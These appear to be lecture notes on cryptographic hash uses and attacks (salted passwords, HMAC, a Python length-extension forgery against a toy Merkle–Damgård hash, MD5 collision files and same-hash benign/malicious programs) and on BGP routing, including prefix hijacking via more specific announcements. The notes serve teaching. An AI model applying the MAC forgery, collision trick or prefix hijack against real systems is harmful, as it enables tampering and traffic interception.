One can prove that he knows a specific secret without telling it. He can simply hash the secret and then disclose the hashed value. The one-way property makes it almost impossible for others to get the secret given the hashed value. The collision-resistant property makes it almost impossible to change the secret without being noticed after disclosing the hashed value.
-
Password verification
It’s unwise to save passwords as plaintext because every user will be compromised if the password database is stolen. If we store the hashed value of password instead, due to the one-way property, it is difficult for the attacker to get user’s password.
-
The use of salt
If multiple users have the same password, their hashed values will be the same. To avoid this situation, we usually hash the password concatenated with a random string called salt. This ensures that the hashed values will differ even if two users have identical passwords.
- On Linux, the hashed password is acquired by hashing the password-salt mixture 5000 times. This slows the hashing process by a factor of 5000, which effectively slows down brute-force attacks.
- None of IV, nonce and salt is necessarily confidential.
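A simplified sketch of salting and repeated hashing is shown below. It illustrates the idea only and is not the actual scheme used by Linux (which mixes the password and salt in a more elaborate way); the function names and the 16-byte salt length are assumptions.

```python
import hashlib
import hmac
import secrets

ROUNDS = 5000

def hash_password(password, salt=None, rounds=ROUNDS):
    """Hash salt+password, then re-hash the digest `rounds` times in total."""
    if salt is None:
        salt = secrets.token_bytes(16)        # fresh random salt per user
    digest = salt + password.encode()
    for _ in range(rounds):
        digest = hashlib.sha512(digest).digest()
    return salt, digest                       # the salt is stored next to the digest

def check_password(password, salt, expected, rounds=ROUNDS):
    _, digest = hash_password(password, salt, rounds)
    return hmac.compare_digest(digest, expected)

salt1, stored1 = hash_password("hunter2")
salt2, stored2 = hash_password("hunter2")     # same password, different user
```

The two stored digests differ because the salts differ, so an attacker who steals the database cannot tell that both users chose the same password.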
-
-
Trusted timestamping
Sometimes we would like to prove we have the copyright of a digital document without publishing it. To do so, we can use a service called trusted timestamping. Basically, instead of publishing the entire digital content, one only publishes the hashed value of the content, either in printed media or through a Time Stamping Authority (TSA). The TSA signs the hash together with a timestamp using its private key to certify that the content existed at that time.
-
Message Authentication Code (MAC)
MAC is used to detect whether the message has been modified or not during transmission. We can use one-way hash functions to implement MAC. Obviously, we cannot just use the hash of a message as the MAC, because this allows anyone to forge the MAC. We need to concatenate a secret key with the actual message first, and then compute the hash. As it turns out, whether the key is put before or after the message significantly affects the security of the resulting MAC. \(\newcommand{\mac}{\operatorname{Hash}}\)\(\newcommand{\msum}{\mathbin{\left\lVert\right.}}\)
-
Length extension attack
Denote the secret key by \(K\) and message by \(M\). Computing the MAC as \(\mac(M \msum K)\) resists the attack described here. If one computes the MAC by \(\mac(K \msum M)\), it will lead to security loopholes!
Recall the Merkle–Damgård construction process. If we compute the MAC by \(\mac(K \msum M)\), it is possible to extend \(M\) and generate the correct MAC without knowing what the key is! More concretely, the attacker needs to know the padding \(P\) that was appended to \(K \msum M\), which only requires knowing the total length of \(K \msum M\). Then, given any message \(T\), he can get \(\mac(K \msum M \msum P \msum T)\), which is a valid MAC for the extended message \(M \msum P \msum T\). This is because the Merkle–Damgård construction breaks the message into blocks and chains the compression function to compute the output, so the known MAC of \(K \msum M\) is exactly the chaining state after \(K \msum M \msum P\) has been processed. All the attacker needs to do is to continue the chain with \(T\) as if it were the rest of the message.
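The attack can be demonstrated on a toy Merkle–Damgård hash. Everything in this sketch is an assumption made for illustration: `toy_hash` is not MD5 or SHA-256 but a minimal hash with the same structure (fixed IV, length padding, chained compression function), and the key and messages are made up.

```python
import hashlib
import struct

BLOCK = 64
IV = b"\x00" * 32

def compress(state, block):
    # Toy compression function: mixes the chaining state with one block.
    return hashlib.sha256(state + block).digest()

def md_padding(total_len):
    # 0x80, zero bytes, then the 8-byte message length in bits.
    zeros = (-(total_len + 1 + 8)) % BLOCK
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)

def toy_hash(message, state=IV, prior_len=0):
    # prior_len: bytes already absorbed into `state` (must be a multiple of BLOCK).
    data = message + md_padding(prior_len + len(message))
    for i in range(0, len(data), BLOCK):
        state = compress(state, data[i:i + BLOCK])
    return state

# Victim: MAC = Hash(K || M)
key = b"0123456789abcdef"
message = b"user=bob&role=guest"
mac = toy_hash(key + message)

# Attacker: knows message, mac and len(key), but not the key itself.
known_len = len(key) + len(message)
padding = md_padding(known_len)                  # the P in K || M || P || T
extension = b"&role=admin"                       # the T chosen by the attacker
forged_message = message + padding + extension
forged_mac = toy_hash(extension, state=mac,
                      prior_len=known_len + len(padding))
```

The forged MAC is computed by resuming the chain from the published MAC, so the key is never needed.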
-
Key-Hash MAC Algorithm (HMAC)
It is really important to avoid reinventing the wheel in cryptography, since the tiniest error can lead to severe security flaws. Almost all existing libraries and algorithms are carefully tweaked to enhance security. There is a well-known algorithm to generate a MAC given a key and a message: we should simply call \(\operatorname{HMAC}(K, M)\).
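In Python, for instance, the standard library already provides this as the `hmac` module. The key and messages below are made-up values for the demo, and the helper name `verify_tag` is hypothetical.

```python
import hashlib
import hmac

key = b"shared secret key"
message = b"amount=100&to=alice"

# Sender: compute the tag and send it along with the message.
tag = hmac.new(key, message, hashlib.sha256).hexdigest()

def verify_tag(key, message, tag):
    """Receiver: recompute the tag and compare in constant time."""
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)
```

`hmac.compare_digest` is used instead of `==` so that the comparison time does not reveal how many leading characters of a forged tag were correct.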
-
-
-
Hash Collision Attacks
-
Forging fake public-key certificates
Suppose an attacker can find two certificates that share the same hash value but have different common names. For example, the first one’s CN is example.com, and the second one’s CN is the attacker’s own attacker32.com. Then he can let the CA sign the second version, and he will effectively have a valid certificate for example.com.
This idea can be extended to forging fake signed programs, PDF documents and so on.
-
Generating two different files with the same MD5 hash
The tool developed by Marc Stevens can generate two files that share the same MD5 value. The two files share the same prefix. For example, messages one and two are shown below.
$ cat message1.bin | xxd
00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587  M.h...\ .r.w{r..
00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518  .o....V.J=.x>{..
00000020: afbf a200 a828 4bf3 6e8e 4b55 b35f 4275  .....(K.n.KU._Bu
00000030: 93d8 4967 6da0 d155 5d83 60fb 5f07 fea2  ..Igm..U].`._...
$ cat message2.bin | xxd
00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587  M.h...\ .r.w{r..
00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518  .o....V.J=.x>{..
00000020: afbf a202 a828 4bf3 6e8e 4b55 b35f 4275  .....(K.n.KU._Bu
00000030: 93d8 4967 6da0 d1d5 5d83 60fb 5f07 fea2  ..Igm...].`._...
The MD5 and SHA-1 sums of these two messages are shown below.
$ md5sum message1.bin message2.bin
008ee33a9d58b51cfeb425b0959121c9  message1.bin
008ee33a9d58b51cfeb425b0959121c9  message2.bin
$ sha1sum message1.bin message2.bin
c6b384c4968b28812b676b49d40c09f8af4ed4cc  message1.bin
c728d8d93091e9c7b87b43d9e33829379231d7ca  message2.bin
If the hash function happens to use the Merkle–Damgård construction, then we can use the length extension technique to append a common suffix to both message1.bin and message2.bin, and their resulting hash values will still be the same.
-
Generating two programs with the same MD5 hash
We can use the same idea above to generate two programs with the same MD5 hash. Suppose the program is given as follows. Assume the xyz array is filled with 200 'A' characters.
#include <stdio.h>

unsigned char xyz[200] = {"..."}; // fill with actual content

int main() {
    int i;
    for (i = 0; i < 200; ++i) {
        printf("%x ", xyz[i]);
    }
}
Now, we can locate the xyz array inside the program’s binary, and we can divide the program into three parts:
- The prefix (whose length must be a multiple of 64 bytes)
- The center (whose length must be 128 bytes)
- The suffix
The center must lie completely inside the array xyz, since it needs to be filled with arbitrary content without affecting the program’s control logic. We run the MD5 collision generator on prefix+center, and we require the prefix part of the two generated messages to be the same. As a result, we are able to come up with two versions of this program, which can be represented by
- Version 1: prefix+Q
- Version 2: prefix+P
where P and Q are different, but both versions have the same hash value. The next step is to use the length extension technique to concatenate the suffix to these two versions. As a result, we have created two programs
- Program 1: prefix+Q+suffix
- Program 2: prefix+P+suffix
which have identical hash values but different data stored in the xyz array.
To alter the control logic of program 1 and program 2 in the attacker’s favor, later code sections can check whether xyz is still filled with all A’s. If xyz is not all A’s, the program can start to execute some malicious code. That is to say, we can create two programs that have the same hash value, but one is benign and the other one is malicious.
-
BGP: Border Gateway Protocol
- Four types of Autonomous Systems (AS)
- Stub
- Multihomed
- Transit
- Internet Exchange Point (IXP)
-
BGP speakers
Each AS has one or more BGP speakers that talk to other ASes. Over a BGP session, they continuously exchange information about which destinations the AS can reach; this is called peering. As a result, a piece of information shared by a single AS can be propagated to the entire Internet.
-
BGP update
- Routing information is updated by prefix advertisement: an AS will announce a specific network prefix is reachable via this AS. For example, AS 11872 can announce prefix 128.230.0.0/16 is reachable.
- There can be multiple paths available to a specific prefix. Usually, the AS will only propagate one path to its neighbor. This path is selected by the path selection algorithm.
-
The path selection algorithm selects a path in the BGP table. A sample BGP table is shown as below.
$ telnet route-views.optus.net.au
route-views.optus.net.au>show bgp
BGP table version is 1098639742, local router ID is 203.202.125.6
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale, m multipath, b backup-path, x best-external
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*  1.0.0.0/24       203.202.143.33                         0 7474 4826 13335 i
*                   202.139.124.130          1             0 7474 4826 13335 i
*                   203.13.132.7            10             0 7474 4826 13335 i
*>                  203.202.143.34                         0 7474 4826 13335 i
*                   192.65.89.161            1             0 7474 4826 13335 i
*> 1.0.4.0/24       203.202.143.33                         0 7474 4826 38803 56203 i
*                   202.139.124.130          1             0 7474 4826 38803 56203 i
*                   203.13.132.7             1             0 7474 4826 38803 56203 i
*                   203.202.143.34                         0 7474 4826 38803 56203 i
*                   192.65.89.161            1             0 7474 4826 38803 56203 i
The selection criteria include:
- weight (larger values are preferred)
- local preference (larger values are preferred)
- locally generated/aggregated routes
- shortest AS path length
-
Path prepending
Suppose an AS is connected to several ISPs (all ASes themselves), but the AS prefers the traffic to go through one particular ISP, while the others are reserved as backups. The AS can enforce this preference by doing path prepending: in the announcements sent through the backup ISPs, it intentionally repeats its own AS number multiple times to increase the length of the AS path.
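The effect of prepending on path selection can be sketched with a simplified model. It only covers the four criteria listed above (real routers apply further tie-breakers), and the `Route` class, the next-hop labels and the private AS numbers are assumptions made for the demo.

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Route:
    next_hop: str
    as_path: List[int]
    weight: int = 0
    local_pref: int = 100
    locally_originated: bool = False

def best_path(routes):
    """Prefer higher weight, then higher local preference, then locally
    originated routes, then the shortest AS path."""
    return max(
        routes,
        key=lambda r: (r.weight, r.local_pref, r.locally_originated, -len(r.as_path)),
    )

# AS 65001 is reachable through ISP 65010 (preferred) and ISP 65020 (backup).
# Towards the backup ISP it prepends its own AS number twice.
via_isp1 = Route(next_hop="via-ISP1", as_path=[65010, 65001])
via_isp2 = Route(next_hop="via-ISP2", as_path=[65020, 65001, 65001, 65001])

chosen = best_path([via_isp2, via_isp1])
```

With equal weight and local preference, the remote router picks the path through ISP 65010 because its AS path is shorter; the prepended path is used only if the first one is withdrawn.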
- Besides updates, withdraw messages can be propagated as well.
- Interior BGP (IBGP): the protocol used for BGP speakers inside one AS to communicate internally.
-
Interior Gateway Protocol (IGP): a type of protocol used for exchanging routing information between gateways (commonly routers) within an autonomous system.
Examples:
- Routing Information Protocol (RIP)
- Open Shortest Path First (OSPF)
-
Overlapping routes
When an IP address matches multiple entries in the BGP table, the entry with the longest matching prefix is selected.
Overlapping routes can be used to achieve:
- Globalization: split subnets into multiple geographic locations in the world.
- Load balancing: allocate each subnet to a BGP entry
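Longest-prefix matching can be sketched with Python's `ipaddress` module. The table contents and next-hop labels below are made up for illustration, and `lookup` is a hypothetical helper, not a router API.

```python
import ipaddress

def lookup(table, address):
    """Return the next hop of the most specific prefix that contains `address`."""
    addr = ipaddress.ip_address(address)
    matches = [(net, hop) for net, hop in table.items() if addr in net]
    if not matches:
        return None
    # The longest prefix (largest prefix length) wins.
    return max(matches, key=lambda m: m[0].prefixlen)[1]

table = {
    ipaddress.ip_network("128.230.0.0/16"): "campus-main",
    ipaddress.ip_network("128.230.64.0/18"): "branch-site",
}

hop_specific = lookup(table, "128.230.70.1")   # inside both prefixes
hop_general = lookup(table, "128.230.1.1")     # inside the /16 only
hop_none = lookup(table, "8.8.8.8")            # no matching entry
```

An address covered by both entries follows the /18, which is how a more specific announcement can carve a subnet out of a larger block.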
-
IP Anycast
To achieve load balancing, there are two approaches:
- Use domain names: dynamic DNS can assign different IP addresses for load balancing.
- Use IP anycast: all machines have the same IP address, and a client only needs to reach the one with the best AS path.
- IP anycast is usually used for stateless services/short connections.
-
Prefix hijacking attack
Suppose you want to hijack 128.230.0.0/16. What you need to do is to announce two more specific prefixes, 128.230.0.0/17 and 128.230.128.0/17. Because the longest match is selected, all traffic to 128.230.0.0/16 will then be diverted to you.
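The two more specific prefixes can be derived, and their coverage checked, with the `ipaddress` module. This is only arithmetic on prefixes; no BGP announcement is involved.

```python
import ipaddress

victim = ipaddress.ip_network("128.230.0.0/16")

# Split the victim prefix into its two halves, each one bit more specific.
more_specifics = list(victim.subnets(prefixlen_diff=1))

# Together the halves cover every address of the original prefix.
fully_covered = sum(n.num_addresses for n in more_specifics) == victim.num_addresses
```

Since every address in the /16 falls inside one of the two /17s, and a /17 is a longer match than a /16, routers that accept the announcements prefer the hijacker's routes for the whole range.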
-
BGP Protection
- Encryption
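- TTL Security: because peering BGP speakers are usually directly connected, they can send packets with TTL 255 and only accept packets that arrive with TTL 255. Every router on the way decrements the TTL, so a packet coming from a remote host cannot arrive with TTL 255.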
- Filtering: filter prefix updates and paths.